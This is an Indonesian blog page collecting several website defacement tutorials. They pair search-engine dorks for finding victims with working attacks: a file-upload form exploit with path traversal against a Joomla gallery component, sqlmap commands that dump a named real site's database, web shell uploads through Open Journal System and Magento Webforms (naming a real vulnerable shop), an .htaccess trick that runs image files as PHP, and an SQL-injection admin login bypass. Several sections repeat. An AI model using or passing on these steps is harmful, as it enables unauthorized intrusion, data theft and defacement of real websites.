Post Top Ad
Friday, November 3, 2017
Sunday, August 6, 2017
Thursday, July 13, 2017
Tutorial Deface : Deface Joomla Simple Photo Gallery Shell Upload
Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?
Dork -> inurl:com_simplephotogallery
Exploit -> /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Enjoy Aje">
</form>
Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
sumber : https://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html
Dork -> inurl:com_simplephotogallery
Exploit -> /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Enjoy Aje">
</form>
Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
sumber : https://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html
Tuesday, July 11, 2017
Tutorial Deface Di Android : Using Sqlmap Android with Termux
Halo dunia :'v, ketemu lagi nih sama mimin rahdev, kali ini w mau share cara make sqlmap di android dengan termux. Lanjutan tutor kemaren.
Bahan :
Akan muncul nama nama mantan yg pernah menyakitimu :'v
Cara liat column disalah satu table gimana ? Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite -T zh_ad --columns"
Bahan :
- Android Lolipop
- Termux ( ada di playstore )
- Sqlmap ( Cek Disini )
- Target vuln
- Buka termux
- Pindah ke directory sqlmap
- Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 --dbs"
- Akan muncul nama database seperti gambar
- Cara liat tablenya gimana ? Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite --tables"
Cara liat column disalah satu table gimana ? Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite -T zh_ad --columns"
- Jeng jeng jeng :'v muncul semua nama column di table zh_ad
- Terus tinggal dump columnnya pake command "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite -T zh_ad --dump".
sumber : http://firmansetyop.blogspot.co.id/2017/07/cara-menggunakan-sqlmap-di-android.html
Tool : cara install sqlmap di android
Halo guys, kali ini w mau share cara install sqlmap di android dengan termux. Kenapa dengan termux ? Karena lebih simple pake termux ketimbang terminal emulator dll.
Bahan :
Cara make sqlmap gimana ? Liat next post ea :v
Bahan :
- Android 5.1+
- Termux ( ada di playstore )
- Internet
- Install dan buka termux
- Ketikkan "apt-get update"
- Install python2.7 dengan command "apt-get install python2"
- Install git dengan command "apt-get install git"
- Clone sqlmap dari github dengan command "git clone https://github.com/sqlmapproject/sqlmap.git"
- Tunggu sampai selesai
- Pindah ke directory sqlmap "cd sqlmap"
- Ketikan "python2 sqlmap.py"
- Jika terinstall akan muncul tulisan sqlmap
- Sqlmap sukses terinstall ^_^
Cara make sqlmap gimana ? Liat next post ea :v
Sunday, July 9, 2017
Tutorial Deface : Cara Deface OJS (Open Journal System) Terbaru
Hello guys ! :) , Okee artikel kali ini saya akan share Cara Deface Website OJS (Open Joursnal System)
Tutorial di kasih secara lengkap kok !
Apa itu OJS ? OJS Adalah sebuah aplikasi Journal Terbuka untuk Management yang biasa di gunakan dalam pemerintah , pendidikan & lembaga lain. Type : Uploader File Data
Vuln/Dork OJS : /index.php/index/user/register (Bisa Registrasi)
Tutorial di kasih secara lengkap kok !
Apa itu OJS ? OJS Adalah sebuah aplikasi Journal Terbuka untuk Management yang biasa di gunakan dalam pemerintah , pendidikan & lembaga lain. Type : Uploader File Data
Vuln/Dork OJS : /index.php/index/user/register (Bisa Registrasi)
- Kamu harus mendaftar dulu di sini > site.com/index.php/index/user/register
2.Setelah Registrasi Klik "New Submission"
3.Selesaikan Step 1
4.Di Step 2 , Kamu dapat upload shell (Format Shell : a.phtml)
5. Jika Sukses Maka Seperti ini :
NB : File name : 4-4-1-SM.phtml 4= ID User kamu Shell Path : /files/joursnals/1/articles/[IDUSER]/Submission/original/[Namafile].phtml
Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml
Jadi kalian ambil angka yang pertama , angka pertama = ID User kamu
Oke sekian terimakasih , jika masih bingung bisa kontak di akun fb.
Semoga bermanfaat ^^ .
sumber : http://cybers1337.blogspot.co.id/2016/12/cara-deface-ojs-open-journal-system.html
Tips : menggunakan htaccess untuk bypass shell
Halo , dipostingan kali ini saya ingin berbagi tentang bagaimana teknik ampuh saat tidak bisa upload backdoor.
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.
Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , .png dan .fla di baca oleh web server menjadi file php
berikut kodenya
atau download langsung filenya disini ( Touch my oppai pliss )
nah kalau sudah terupload , silahkan upload shell yang extnya .png . txt or .fla di dir yang sama dengan htaccess yang tadi
jangan up shell yang ext .php.png .php.txt dan .php.fla cukup ext diatas aja um
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.
Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , .png dan .fla di baca oleh web server menjadi file php
berikut kodenya
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
save dengan .htaccess dan filetype all jangan nama filenya .htaccess.txt atau download langsung filenya disini ( Touch my oppai pliss )
nah kalau sudah terupload , silahkan upload shell yang extnya .png . txt or .fla di dir yang sama dengan htaccess yang tadi
jangan up shell yang ext .php.png .php.txt dan .php.fla cukup ext diatas aja um
Sumber : https://forum.surabayablackhat.org/d/154-teknik-ampuh-saat-tidak-bisa-upload-backdoor
Thursday, July 6, 2017
Tutorial Deface : Menggunakan Magento Webforms Shell Upload Vulnerabilty
Kali ini gua mau Repost Artikel gua Teknik Deface Menggunakan Magento Webforms File Upload Vulnerabilty
Google Dork :
- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop dll
(kembangkan)
atau kalian bisa pakai Dork Magento Add Admin
Dork Magento Lengkap
CSRF:
kalian bisa pakai CSRF Online di Sini
atau pakai CSRF sendiri
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>
Kalau pake CSRF Online ini POST File dengan : files[]
Exploit :
www.site.com/path//js/webforms/upload/index.php
Vulnerabilty : []
Contoh site vuln :
https://shop.destrooper.com/js/webforms/upload/index.php
Step By Step :
1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target
2. Upload File kamu. Bisa di upload shell tapi kalau error coba ganti ext jadi .phtml
kalau masih error upload aja script deface mu
kalau sudah , klik Upload
3. Nanti akan muncul angka random
4. Tetak Shell atau File kita
www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc
kalau masih binggung silahkan liat vidio di bawah
Sumber : https://cowokerensteam.blogspot.co.id/2017/01/deface-menggunakan-magento-webforms.html
Tutorial Deface : Bypass Admin CMS Biz1m.com
Hello World; Malaam Fans, Please Say Hello Haters ;*
begimana kabar lu pade ? ya gue tau , masih pade menjomblo kan :p wkwkkw xD
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
gimana dikit lagi lebaran nih (bagi yang menjalankan), tapi sloww Kesalahan lu pada dah gue maafin kok wkwkwkkw.
Artikel Tutorial kali ini gue dikasih sama Keluarga Dumay gue yaitu bang pu.sh , tq bang pu.sh :*
kalo gak di titipin artikel, gue juga gak bakal buka blog lagi nih wkwkkw >..<"
langsung aja dah, gue baru sampe rumah. artikel kali ini adalah Tutorial Deface Website Bypass Admin CMS Biz1m.com.
Dork : intext:Jumlah ahli ahli vip jumlah lawatan
Admin page : /admin-cp/
Exploit : ‘ or 1=1 limit 1 -- -+
1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh
2. Masuk ke web target, buka admin page nya di, http://target.com/admin-cp/
3. Masuka username : ‘ or 1=1 limit 1 -- -+ dan password : ‘ or 1=1 limit 1 -- -+
4. Jika sudah maka akan tampak admin dashboardnya
5. Jika sudah, sekarang waktunya upload shell, buka di http://target.com/admin-cp.php?buka=iklanvvip
6. Pilih edit, lalu sekarang kita upload shell dengan ext shell.php.jpg
7. Sebelum kita upload shell, buka Tamper Data,lalu start tamper data,klik submit,buka tampernya, kita edit nama file menjadi shell.php melalui tamper data.
Menjadii
8. Jika sudah, klik Ok, maka akan terupload shell / uploader kita, dan muncul link akses shell / uploader tersebut
9. Sekarang kita coba buka uploader yang sudah terupload, melalui link yang muncul di web target.
Dan liat, uploader nya sudah terupload, sekarang bebas kalian mau apa, disini saya hanya akan mengupload script di dir root nya.
Woot? Happy Deface !
NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh
begimana kabar lu pade ? ya gue tau , masih pade menjomblo kan :p wkwkkw xD
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
gimana dikit lagi lebaran nih (bagi yang menjalankan), tapi sloww Kesalahan lu pada dah gue maafin kok wkwkwkkw.
Artikel Tutorial kali ini gue dikasih sama Keluarga Dumay gue yaitu bang pu.sh , tq bang pu.sh :*
kalo gak di titipin artikel, gue juga gak bakal buka blog lagi nih wkwkkw >..<"
langsung aja dah, gue baru sampe rumah. artikel kali ini adalah Tutorial Deface Website Bypass Admin CMS Biz1m.com.
Dork : intext:Jumlah ahli ahli vip jumlah lawatan
Admin page : /admin-cp/
Exploit : ‘ or 1=1 limit 1 -- -+
1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh
2. Masuk ke web target, buka admin page nya di, http://target.com/admin-cp/
3. Masuka username : ‘ or 1=1 limit 1 -- -+ dan password : ‘ or 1=1 limit 1 -- -+
4. Jika sudah maka akan tampak admin dashboardnya
5. Jika sudah, sekarang waktunya upload shell, buka di http://target.com/admin-cp.php?buka=iklanvvip
6. Pilih edit, lalu sekarang kita upload shell dengan ext shell.php.jpg
7. Sebelum kita upload shell, buka Tamper Data,lalu start tamper data,klik submit,buka tampernya, kita edit nama file menjadi shell.php melalui tamper data.
Menjadii
9. Sekarang kita coba buka uploader yang sudah terupload, melalui link yang muncul di web target.
Dan liat, uploader nya sudah terupload, sekarang bebas kalian mau apa, disini saya hanya akan mengupload script di dir root nya.
Woot? Happy Deface !
NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh
dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD
sumber = http://www.tkjcyberart.org/2017/06/bypass-admin-cms-biz1mcom.html